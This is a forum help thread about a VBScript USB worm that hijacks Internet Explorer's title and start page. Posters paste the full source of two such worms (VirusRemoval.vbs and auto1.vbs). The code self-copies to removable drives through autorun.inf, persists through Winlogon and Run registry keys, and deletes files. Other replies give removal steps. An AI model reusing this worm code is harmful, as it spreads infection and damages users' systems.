wscript.exe is it to blame?

Status
Not open for further replies.

gsoul2soul

WOW... are you?
This is irritating like hell.... trust me !!!

Well somehow i have contracted this lil "virus, or bug... or some script written by pesty over smart programmer" grrrrr x(

Now thing is when i open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all"

Now i remove the title bar "name" and also change the home page in my IE... and as soon as i restart my browser... Blast !! there you go, it appears again !!!

BUT when i kill the "wscript.exe" from "Windows Task manager" it won't happen... why ? what ? and how to remove this problem !!!

HELP... HELP
Mike here... desperate
 

QwertyManiac

Commander in Chief
I think I already helped you with the same problem before or this is a false deja vu am experiencing ...

Anyway, you're infected with the "Hacked by Godzilla" attack.

Solution's here:
*howto.redcomputer.net/windows/hacked_by_godzilla.php
 
OP
gsoul2soul

gsoul2soul

WOW... are you?
qwerty maniac thanks... but that file is not there, the one i should delete. the "vbs file"

Anyways mine just says in IE title bar "www.sujin.com.np" and tries to re-direct my browser to this site... which is now down :(

help
 

QwertyManiac

Commander in Chief
Site's pretty apologetic but I think its nearly the same infection.

From site (Google Cache):
If you were directed here through a virus-like program, then I would like to apologize for the problems you had to face because of me. I didn't mean to harm anyone or anyone's computer through this program. The small little script was developed to prevent your computer from any sorts of virus attacks. The script that I developed, would repair any problems in your computer that other viruses had damaged and also prevent any other viruses to enter into your computer. I am sure your computer was not infected by any viruses as long as my script was running in your computer. If you don't believe me just check the script, which is located at the system32 directory as VirusRemoval.vbs

In order to free your computer from my program, please CLICK HERE to download a program called 'Scanner'.
Run this program to free your computer from my script as well as some of the most common viruses.

Please insert your pen drives in your computer while running the program to remove the script from those drives as well

Are the other files taken care of? Any other VBS files might be deleted as well. Perform the same steps just more flexibly :)

And yes, delete ALL vbs and autorun from all your drives, even your externals, pen drives and phones.
 
OP
gsoul2soul

gsoul2soul

WOW... are you?
I opened one of my Pen drives... and found this "Virusremoval.vbs" and "autorun.inf"

Now i opened the VBS file in Notepad... and here what it says:
Shall i click on it... or is it just a way of infecting more?

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'*Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","*sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
 

Yavin

Yalam
First
Open task manager and kill process wscript.exe.

Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.

Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.

Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell which should have value of just explorer.exe.
delete anything after explorer.exe.

Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.

Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np

Under the same key locate Start Page and delete its value i.e. *sujin.com.np/

I think that's all guys. I'm sure it will help.


Guys u can also disable the use of vbs and js files from the registry. For that
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs or js files it will display the message you can see on your own.
 

NavinRaj

Right off the assembly line
Yavin's process removes the virus but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and enable the disabled task manager and folder options.

You guys can also try it from:

*www.kusom.edu.np/new/notices_detail.php?noticeid=13
or
*www.swiftnepal.net/

Yavin said:
First
Open task manager and kill process wscript.exe.

Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.

Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.

Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell which should have value of just explorer.exe.
delete anything after explorer.exe.

Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.

Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np

Under the same key locate Start Page and delete its value i.e. *sujin.com.np/

I think that's all guys. I'm sure it will help.


Guys u can also disable the use of vbs and js files from the registry. For that
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs or js files it will display the message you can see on your own.
 
Last edited:

bhutanesedude

The Thunderer
Does any one have a software of Antivirus which can remove this sujin.com.np? I think I have to inform the case to Cyber Crime Investigation so that who ever is this Sujin is wrecked for the whole life to avoid in making such kind of tools. this hell **** is making my system slow and even I cannot do my work efficiently.
 

saubrl

Broken In
Dont u use any antivirus?
I use NOD32 with update 3 month old but even it is able to detect wscript.exe.
 

bhutanesedude

The Thunderer
NOD32? Does this functions good enough to clear this virus from every corner o our system? or it just takes out the title and web address from our IE.....I think *www.swiftnepal.net/ has a anti virus for this problem which functions well...what u think my fellow users?
 

apslogin@gmail.com

Right off the assembly line
How can remove Virusremoval.vbs


Setp1:eek:pen My computer
Setp 2: go to toos Menu>folder Options>view (TAb)> Uncheck Hide extentions for known file types & check Show hiden file and folder & unchek Hide protected operating system files.
Step3: go run> c:\windows\system32\
Step4: Search "Virsuremoval.vbs"
Step5:rename file "Virsuremoval.vbs" to "virusremoval"

and

Enjoy!
 

Wilhelm

Right off the assembly line
I opened one of my Pen drives... and found this "auto1.vbs" and "autorun.inf"

Now i opened the VBS file in Notepad... and here what it says:
Shall i click on it... or is it just a way of infecting more?



On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "auto1.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\auto1.vbs")

Set myFile = fso.CreateTextFile(win & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\auto1.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1", "wscript.exe """ & win & "\auto1.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\auto1.vbs"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Command=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\auto1.vbs")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\auto1.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If tf <> win & "\auto1.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
 
The post from NavinRaj should definitely work because it had been a big issue in Nepal several years ago and the tool suggested fixed it good.
 
Status
Not open for further replies.
Top Bottom